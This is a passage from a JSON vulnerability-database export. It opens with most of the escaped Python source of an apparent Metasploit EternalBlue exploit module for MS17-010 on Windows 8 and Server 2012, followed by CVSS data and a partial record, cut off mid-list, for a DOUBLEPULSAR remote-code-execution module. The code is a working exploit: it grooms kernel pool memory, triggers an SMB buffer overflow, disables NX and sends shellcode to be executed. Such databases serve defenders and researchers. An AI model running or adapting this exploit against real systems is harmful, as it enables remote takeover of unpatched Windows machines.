conn.get_flags()\n # if not use unicode, buffer size on target machine is doubled because converting ascii to utf16\n if size >= 0xffff:\n flags2 &= ~smb.SMB.FLAGS2_UNICODE\n reqSize = size // 2\n else:\n flags2 |= smb.SMB.FLAGS2_UNICODE\n reqSize = size\n conn.set_flags(flags2=flags2)\n\n pkt = smb.NewSMBPacket()\n\n sessionSetup = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX)\n sessionSetup['Parameters'] = smb.SMBSessionSetupAndX_Extended_Parameters()\n\n sessionSetup['Parameters']['MaxBufferSize'] = 61440 # can be any value greater than response size\n sessionSetup['Parameters']['MaxMpxCount'] = 2 # can by any value\n sessionSetup['Parameters']['VcNumber'] = 2 # any non-zero\n sessionSetup['Parameters']['SessionKey'] = 0\n sessionSetup['Parameters']['SecurityBlobLength'] = 0 # this is OEMPasswordLen field in another format. 0 for NULL session\n sessionSetup['Parameters']['Capabilities'] = smb.SMB.CAP_EXTENDED_SECURITY | smb.SMB.CAP_USE_NT_ERRORS\n\n sessionSetup['Data'] = pack('<H', reqSize) + '\\x00'*20\n pkt.addCommand(sessionSetup)\n\n conn.sendSMB(pkt)\n recvPkt = conn.recvSMB()\n if recvPkt.getNTStatus() == 0:\n module.log('SMB1 session setup allocate nonpaged pool success')\n return conn\n\n if username:\n # Try login with valid user because anonymous user might get access denied on Windows Server 2012.\n # Note: If target allows only NTLMv2 authentication, the login will always fail.\n # support only ascii because I am lazy to implement Unicode (need pad for alignment and converting username to utf-16)\n flags2 &= ~smb.SMB.FLAGS2_UNICODE\n reqSize = size // 2\n conn.set_flags(flags2=flags2)\n\n # new SMB packet to reset flags\n pkt = smb.NewSMBPacket()\n pwd_unicode = conn.get_ntlmv1_response(ntlm.compute_nthash(password))\n # UnicodePasswordLen field is in Reserved for extended security format.\n sessionSetup['Parameters']['Reserved'] = len(pwd_unicode)\n sessionSetup['Data'] = pack('<H', reqSize+len(pwd_unicode)+len(username)) + pwd_unicode + username + '\\x00'*16\n pkt.addCommand(sessionSetup)\n\n conn.sendSMB(pkt)\n recvPkt = conn.recvSMB()\n if recvPkt.getNTStatus() == 0:\n module.log('SMB1 session setup allocate nonpaged pool success')\n return conn\n\n # lazy to check error code, just print fail message\n module.log('SMB1 session setup allocate nonpaged pool failed', 'error')\n sys.exit(1)\n\n\n# Note: impacket-0.9.15 struct has no ParameterDisplacement\n############# SMB_COM_TRANSACTION2_SECONDARY (0x33)\nif not dependencies_missing:\n class SMBTransaction2Secondary_Parameters_Fixed(smb.SMBCommand_Parameters):\n structure = (\n ('TotalParameterCount', '<H=0'),\n ('TotalDataCount', '<H'),\n ('ParameterCount', '<H=0'),\n ('ParameterOffset', '<H=0'),\n ('ParameterDisplacement', '<H=0'),\n ('DataCount', '<H'),\n ('DataOffset', '<H'),\n ('DataDisplacement', '<H=0'),\n ('FID', '<H=0'),\n )\n\ndef send_trans2_second(conn, tid, data, displacement):\n pkt = smb.NewSMBPacket()\n pkt['Tid'] = tid\n\n # assume no params\n\n transCommand = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION2_SECONDARY)\n transCommand['Parameters'] = SMBTransaction2Secondary_Parameters_Fixed()\n transCommand['Data'] = smb.SMBTransaction2Secondary_Data()\n\n transCommand['Parameters']['TotalParameterCount'] = 0\n transCommand['Parameters']['TotalDataCount'] = len(data)\n\n fixedOffset = 32+3+18\n transCommand['Data']['Pad1'] = ''\n\n transCommand['Parameters']['ParameterCount'] = 0\n transCommand['Parameters']['ParameterOffset'] = 0\n\n if len(data) > 0:\n pad2Len = (4 - fixedOffset % 4) % 4\n transCommand['Data']['Pad2'] = '\\xFF' * pad2Len\n else:\n transCommand['Data']['Pad2'] = ''\n pad2Len = 0\n\n transCommand['Parameters']['DataCount'] = len(data)\n transCommand['Parameters']['DataOffset'] = fixedOffset + pad2Len\n transCommand['Parameters']['DataDisplacement'] = displacement\n\n transCommand['Data']['Trans_Parameters'] = ''\n transCommand['Data']['Trans_Data'] = data\n pkt.addCommand(transCommand)\n\n conn.sendSMB(pkt)\n\n\ndef send_big_trans2(conn, tid, setup, data, param, firstDataFragmentSize, sendLastChunk=True):\n pkt = smb.NewSMBPacket()\n pkt['Tid'] = tid\n\n command = pack('<H', setup)\n\n # Use SMB_COM_NT_TRANSACT because we need to send data >65535 bytes to trigger the bug.\n transCommand = smb.SMBCommand(smb.SMB.SMB_COM_NT_TRANSACT)\n transCommand['Parameters'] = smb.SMBNTTransaction_Parameters()\n transCommand['Parameters']['MaxSetupCount'] = 1\n transCommand['Parameters']['MaxParameterCount'] = len(param)\n transCommand['Parameters']['MaxDataCount'] = 0\n transCommand['Data'] = smb.SMBTransaction2_Data()\n\n transCommand['Parameters']['Setup'] = command\n transCommand['Parameters']['TotalParameterCount'] = len(param)\n transCommand['Parameters']['TotalDataCount'] = len(data)\n\n fixedOffset = 32+3+38 + len(command)\n if len(param) > 0:\n padLen = (4 - fixedOffset % 4 ) % 4\n padBytes = '\\xFF' * padLen\n transCommand['Data']['Pad1'] = padBytes\n else:\n transCommand['Data']['Pad1'] = ''\n padLen = 0\n\n transCommand['Parameters']['ParameterCount'] = len(param)\n transCommand['Parameters']['ParameterOffset'] = fixedOffset + padLen\n\n if len(data) > 0:\n pad2Len = (4 - (fixedOffset + padLen + len(param)) % 4) % 4\n transCommand['Data']['Pad2'] = '\\xFF' * pad2Len\n else:\n transCommand['Data']['Pad2'] = ''\n pad2Len = 0\n\n transCommand['Parameters']['DataCount'] = firstDataFragmentSize\n transCommand['Parameters']['DataOffset'] = transCommand['Parameters']['ParameterOffset'] + len(param) + pad2Len\n\n transCommand['Data']['Trans_Parameters'] = param\n transCommand['Data']['Trans_Data'] = data[:firstDataFragmentSize]\n pkt.addCommand(transCommand)\n\n conn.sendSMB(pkt)\n recvPkt = conn.recvSMB() # must be success\n if recvPkt.getNTStatus() == 0:\n module.log('got good NT Trans response')\n else:\n module.log('got bad NT Trans response: 0x{:x}'.format(recvPkt.getNTStatus()), 'error')\n sys.exit(1)\n\n # Then, use SMB_COM_TRANSACTION2_SECONDARY for send more data\n i = firstDataFragmentSize\n while i < len(data):\n sendSize = min(4096, len(data) - i)\n if len(data) - i <= 4096:\n if not sendLastChunk:\n break\n send_trans2_second(conn, tid, data[i:i+sendSize], i)\n i += sendSize\n\n if sendLastChunk:\n conn.recvSMB()\n return i\n\n\n# connect to target and send a large nbss size with data 0x80 bytes\n# this method is for allocating big nonpaged pool on target\ndef createConnectionWithBigSMBFirst80(target, port, for_nx=False):\n sk = socket.create_connection((target, port))\n pkt = '\\x00' + '\\x00' + pack('>H', 0x8100)\n # There is no need to be SMB2 because we want the target free the corrupted buffer.\n # Also this is invalid SMB2 message.\n # I believe NSA exploit use SMB2 for hiding alert from IDS\n #pkt += '\\xfeSMB' # smb2\n # it can be anything even it is invalid\n pkt += 'BAAD' # can be any\n if for_nx:\n # MUST set no delay because 1 byte MUST be sent immediately\n sk.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)\n pkt += '\\x00'*0x7b # another byte will be sent later to disabling NX\n else:\n pkt += '\\x00'*0x7c\n sk.send(pkt)\n return sk\n\n\ndef _exploit(target, port, feaList, shellcode, numGroomConn, username, password):\n # force using smb.SMB for SMB1\n conn = smb.SMB(target, target, sess_port = port)\n conn.login(username, password)\n server_os = conn.get_server_os()\n module.log('Target OS: '+server_os)\n if server_os.startswith(\"Windows 10 \"):\n build = int(server_os.split()[-1])\n if build >= 14393: # version 1607\n module.log('This exploit does not support this build: {} >= 14393'.format(build), 'error')\n sys.exit(1)\n elif not (server_os.startswith(\"Windows 8\") or server_os.startswith(\"Windows Server 2012 \")):\n module.log('This exploit does not support this target: {}'.format(server_os), 'error')\n sys.exit(1)\n\n tid = conn.tree_connect_andx('\\\\\\\\'+target+'\\\\'+'IPC$')\n\n # The minimum requirement to trigger bug in SrvOs2FeaListSizeToNt() is SrvSmbOpen2() which is TRANS2_OPEN2 subcommand.\n # Send TRANS2_OPEN2 (0) with special feaList to a target except last fragment\n progress = send_big_trans2(conn, tid, 0, feaList, '\\x00'*30, len(feaList)%4096, False)\n\n # Another TRANS2_OPEN2 (0) with special feaList for disabling NX\n nxconn = smb.SMB(target, target, sess_port = port)\n nxconn.login(username, password)\n nxtid = nxconn.tree_connect_andx('\\\\\\\\'+target+'\\\\'+'IPC$')\n nxprogress = send_big_trans2(nxconn, nxtid, 0, feaListNx, '\\x00'*30, len(feaList)%4096, False)\n\n # create some big buffer at server\n # this buffer MUST NOT be big enough for overflown buffer\n allocConn = createSessionAllocNonPaged(target, port, NTFEA_SIZE - 0x2010, username, password)\n\n # groom nonpaged pool\n # when many big nonpaged pool are allocated, allocate another big nonpaged pool should be next to the last one\n srvnetConn = []\n for i in range(numGroomConn):\n sk = createConnectionWithBigSMBFirst80(target, port, for_nx=True)\n srvnetConn.append(sk)\n\n # create buffer size NTFEA_SIZE at server\n # this buffer will be replaced by overflown buffer\n holeConn = createSessionAllocNonPaged(target, port, NTFEA_SIZE-0x10, username, password)\n # disconnect allocConn to free buffer\n # expect small nonpaged pool allocation is not allocated next to holeConn because of this free buffer\n allocConn.get_socket().close()\n\n # hope one of srvnetConn is next to holeConn\n for i in range(5):\n sk = createConnectionWithBigSMBFirst80(target, port, for_nx=True)\n srvnetConn.append(sk)\n\n # remove holeConn to create hole for fea buffer\n holeConn.get_socket().close()\n\n # send last fragment to create buffer in hole and OOB write one of srvnetConn struct header\n # first trigger, overwrite srvnet buffer struct for disabling NX\n send_trans2_second(nxconn, nxtid, feaListNx[nxprogress:], nxprogress)\n recvPkt = nxconn.recvSMB()\n retStatus = recvPkt.getNTStatus()\n if retStatus == 0xc000000d:\n module.log('good response status for nx: INVALID_PARAMETER')\n else:\n module.log('bad response status for nx: 0x{:08x}'.format(retStatus), 'error')\n\n # one of srvnetConn struct header should be modified\n # send '\\x00' to disable nx\n for sk in srvnetConn:\n sk.send('\\x00')\n\n # send last fragment to create buffer in hole and OOB write one of srvnetConn struct header\n # second trigger, place fake struct and shellcode\n send_trans2_second(conn, tid, feaList[progress:], progress)\n recvPkt = conn.recvSMB()\n retStatus = recvPkt.getNTStatus()\n if retStatus == 0xc000000d:\n module.log('good response status: INVALID_PARAMETER')\n else:\n module.log('bad response status: 0x{:08x}'.format(retStatus), 'error')\n\n # one of srvnetConn struct header should be modified\n # a corrupted buffer will write recv data in designed memory address\n for sk in srvnetConn:\n sk.send(fake_recv_struct + shellcode)\n\n # execute shellcode\n for sk in srvnetConn:\n sk.close()\n\n # nicely close connection (no need for exploit)\n nxconn.disconnect_tree(tid)\n nxconn.logoff()\n nxconn.get_socket().close()\n conn.disconnect_tree(tid)\n conn.logoff()\n conn.get_socket().close()\n\n\ndef exploit(args):\n if dependencies_missing:\n module.log('Module dependencies (impacket) missing, cannot continue', 'error')\n sys.exit(1)\n\n # XXX: Normalize strings to ints and unset options to empty strings\n rport = int(args['RPORT'])\n numGroomConn = int(args['GroomAllocations'])\n smbuser = args['SMBUser'] if 'SMBUser' in args else ''\n smbpass = args['SMBPass'] if 'SMBPass' in args else ''\n\n # XXX: JSON-RPC requires UTF-8, so we Base64-encode the binary payload\n sc = eternalblue_kshellcode_x64(args['ProcessName']) + b64decode(args['payload_encoded'])\n\n if len(sc) > 0xe80:\n module.log('Shellcode too long. The place that this exploit put a shellcode is limited to {} bytes.'.format(0xe80), 'error')\n sys.exit(1)\n\n # Now, shellcode is known. create a feaList\n feaList = createFeaList(len(sc))\n\n module.log('shellcode size: {:d}'.format(len(sc)))\n module.log('numGroomConn: {:d}'.format(numGroomConn))\n\n try:\n _exploit(args['RHOST'], rport, feaList, sc, numGroomConn, smbuser, smbpass)\n # XXX: Catch everything until we know better\n except Exception as e:\n module.log(str(e), 'error')\n sys.exit(1)\n\n module.log('done')\n\n\nif __name__ == '__main__':\n module.run(metadata, exploit)\n", "metasploitReliability": "", "metasploitHistory": "", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "142f691ada068c40ae71fdd0eac8502e"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "6c1573fb8afad953575e88410f63a2fc"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "bc9f4d2df77a7e598c51cbbb28b6c763"}, {"key": "published", "hash": "b60f5906fe6c7ab38d837f22d4eafee6"}, {"key": "references", "hash": "5b950e6a1604ac171f8fe1ccc327b50e"}, {"key": "reporter", "hash": "74798933f90c8c8a3dcac277d7c31e76"}, {"key": "title", "hash": "a399fb2a0d2b54be61b63ce9fb2f1e84"}, {"key": "type", "hash": "6719951e37a5b7c4b959f8df50c9d641"}], "scheme": null}, {"id": "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "hash": "37a59697b8bf700899c7482ddd4a73575b4458f187d3ff962fb314916bc9874d", "type": "metasploit", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution", "description": "This module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.\n", "published": "2020-02-03T17:16:16", "modified": "2020-06-09T12:18:52", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", "https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/", "https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/", "https://github.com/countercept/doublepulsar-detection-script", "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", "https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "lastseen": "2020-10-03T19:20:37", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "This module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2020-10-03T19:20:37", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["KB4013389", "KB4012598"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"], "type": "trendmicroblog"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-10-03T19:20:37", "rev": 2, "value": 7.8, "vector": "NONE"}}, "hash": "d2c2dbee920907ec88d6ede164e6a44fcecdff927ad3de6ca391edbdb39a6aba", "hashmap": [{"hash": "a350165a58d78e6a7f1ec63091a5caba", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "79b03fa9178806f1694441cff96d84a3", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "href"}, {"hash": "c25dabffe89097874a062017ca347cc8", "key": "published"}, {"hash": "2a4acb977d851155649ad6e4f1698975", "key": "references"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "74798933f90c8c8a3dcac277d7c31e76", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "type"}, {"hash": "142f691ada068c40ae71fdd0eac8502e", "key": "cvelist"}, {"hash": "fe7cd07cb53ebe88d1bb8c3cb4d4de83", "key": "title"}], "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "immutableFields": [], "lastseen": "2020-10-03T19:20:37", "modified": "2020-06-09T12:18:52", "objectVersion": "1.5", "published": "2020-02-03T17:16:16", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/", "https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1", "https://github.com/countercept/doublepulsar-detection-script", "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "title": "SMB DOUBLEPULSAR Remote Code Execution", "type": "metasploit", "viewCount": 844}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2020-10-03T19:20:37"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "This module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.\n", "enchantments": {"dependencies": {"modified": "2020-07-12T16:01:04", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/BROWSER/MS08_053_MEDIAENCODER", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", 